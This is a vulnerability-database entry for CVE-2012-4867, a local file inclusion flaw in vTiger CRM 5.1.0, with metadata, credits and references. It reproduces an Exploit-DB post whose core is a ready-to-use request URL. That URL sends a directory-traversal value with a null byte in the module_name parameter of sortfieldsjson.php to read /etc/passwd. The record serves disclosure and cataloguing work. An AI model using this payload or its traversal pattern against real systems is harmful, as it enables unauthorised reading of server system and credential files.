ID
VAR-E-201204-0615
CVE
cve_id: | CVE-2012-4867 | Trust: 1.6 |
EDB ID
18770
TITLE
vTiger CRM 5.1.0 - Local File Inclusion - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
vTiger CRM 5.1.0 - Local File Inclusion. CVE-80552, CVE-2012-4867. webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | vtiger | model: | crm | scope: | eq | version: | 5.1.0 | Trust: 1.6 |
EXPLOIT
# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none
We have found this vulnerability in VTiger 5.1.0.
In this example, you can see a Local File Inclusion in the file sortfieldsjson.php.
Try this:
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local File Inclusion
Trust: 1.6
CREDITS
Pi3rrot
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2012-4867 | Trust: 1.6 |
db: | EXPLOIT-DB | id: | 18770 | Trust: 1.6 |
db: | EDBNET | id: | 41081 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-4867 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/18770/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 18770 |
db: | EDBNET | id: | 41081 |
LAST UPDATE DATE
2022-07-27T09:56:51.269000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 18770 | date: | 2012-04-22T00:00:00 |
db: | EDBNET | id: | 41081 | date: | 2012-04-22T00:00:00 |